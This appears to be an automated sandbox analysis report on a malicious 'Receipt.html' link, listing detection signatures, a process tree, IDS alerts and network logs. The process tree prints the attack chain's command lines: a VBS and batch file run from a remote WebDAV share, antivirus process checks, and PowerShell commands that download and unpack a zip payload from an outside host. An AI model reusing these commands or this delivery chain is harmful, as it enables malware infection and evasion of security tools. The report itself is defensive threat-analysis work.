Edit tour
Windows
Analysis Report
https://listafrica.org/Receipt.html
Overview
Detection
WinSearchAbuse
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Suricata IDS alerts for network traffic
Yara detected WinSearchAbuse
Chrome launches external ms-search protocol handler (WebDAV)
Loading BitLocker PowerShell Module
Opens network shares
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64_ra
- chrome.exe (PID: 6260 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - chrome.exe (PID: 6452 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2208 --fi eld-trial- handle=179 2,i,964818 8583902023 499,364781 0632220696 810,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- chrome.exe (PID: 7132 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://lista frica.org/ Receipt.ht ml" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - conhost.exe (PID: 5824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 5588 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- wscript.exe (PID: 7608 cmdline:
"C:\Window s\System32 \WScript.e xe" "\\por tion-bottl e-statute- breeding.t rycloudfla re.com@SSL \DavWWWRoo t\new.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7664 cmdline:
"C:\Window s\System32 \cmd.exe" /c \\porti on-bottle- statute-br eeding.try cloudflare .com@SSL\D avWWWRoot\ new.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Acrobat.exe (PID: 8064 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \Downloads \IPKGELNTQ Y.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7500 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 644 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 76 --field -trial-han dle=1592,i ,724755192 9779357345 ,131997602 1633977183 7,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - timeout.exe (PID: 8084 cmdline:
timeout /t 5 REM Wa it for PDF to open ( adjust tim eout as ne eded) MD5: 100065E21CFBBDE57CBA2838921F84D6) - tasklist.exe (PID: 6804 cmdline:
tasklist / FI "IMAGEN AME eq Ava stUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - find.exe (PID: 7272 cmdline:
find /i "A vastUI.exe " MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - tasklist.exe (PID: 1252 cmdline:
tasklist / FI "IMAGEN AME eq avg ui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - find.exe (PID: 2968 cmdline:
find /i "a vgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - powershell.exe (PID: 5896 cmdline:
powershell -Command "try { [Ne t.ServiceP ointManage r]::Securi tyProtocol = [Net.Se curityProt ocolType]: :Tls12; In voke-WebRe quest -Uri 'http://k inggamming invoicfin. shop:8510/ bab.zip' - OutFile 'C :\Users\us er\Downloa ds\downloa ded.zip' } catch { e xit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 8088 cmdline:
"C:\Window s\System32 \WScript.e xe" "\\por tion-bottl e-statute- breeding.t rycloudfla re.com@SSL \DavWWWRoo t\new.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7400 cmdline:
"C:\Window s\System32 \cmd.exe" /c \\porti on-bottle- statute-br eeding.try cloudflare .com@SSL\D avWWWRoot\ new.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Acrobat.exe (PID: 7724 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \Downloads \IPKGELNTQ Y.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - timeout.exe (PID: 7976 cmdline:
timeout /t 5 REM Wa it for PDF to open ( adjust tim eout as ne eded) MD5: 100065E21CFBBDE57CBA2838921F84D6) - tasklist.exe (PID: 3856 cmdline:
tasklist / FI "IMAGEN AME eq Ava stUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - find.exe (PID: 3420 cmdline:
find /i "A vastUI.exe " MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - tasklist.exe (PID: 6972 cmdline:
tasklist / FI "IMAGEN AME eq avg ui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - find.exe (PID: 6968 cmdline:
find /i "a vgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - powershell.exe (PID: 3592 cmdline:
powershell -Command "try { [Ne t.ServiceP ointManage r]::Securi tyProtocol = [Net.Se curityProt ocolType]: :Tls12; In voke-WebRe quest -Uri 'http://k inggamming invoicfin. shop:8510/ bab.zip' - OutFile 'C :\Users\us er\Downloa ds\downloa ded.zip' } catch { e xit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 8016 cmdline:
powershell -Command "try { [Ne t.ServiceP ointManage r]::Securi tyProtocol = [Net.Se curityProt ocolType]: :Tls12; In voke-WebRe quest -Uri 'http://k inggamming invoicfin. shop:8510/ bab.zip' - OutFile 'C :\Users\us er\Downloa ds\downloa ded.zip' } catch { e xit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5812 cmdline:
powershell -Command "try { Exp and-Archiv e -Path 'C :\Users\us er\Downloa ds\downloa ded.zip' - Destinatio nPath 'C:\ Users\user \Downloads \Extracted ' -Force } catch { e xit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_WinSearchAbuse | Yara detected WinSearchAbuse | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_WinSearchAbuse | Yara detected WinSearchAbuse | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-10T16:04:47.102637+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49726 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:04:47.102637+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49726 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:17.441795+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49746 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:17.441795+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49746 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:19.127842+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49747 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:19.127842+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49747 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:34.279961+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49756 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:34.279961+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49756 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:34.746162+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49756 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:34.746162+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49756 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:35.380733+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49756 | 154.216.17.175 | 4843 | TCP |
2024-12-10T16:05:35.380733+0100 | 2055990 | 1 | A Network Trojan was detected | 192.168.2.17 | 49756 | 154.216.17.175 | 4843 | TCP |
Click to jump to signature section
Show All Signature Results
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Software Vulnerabilities |
---|
Source: | File source: | ||
Source: | File source: |
Source: | Child: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |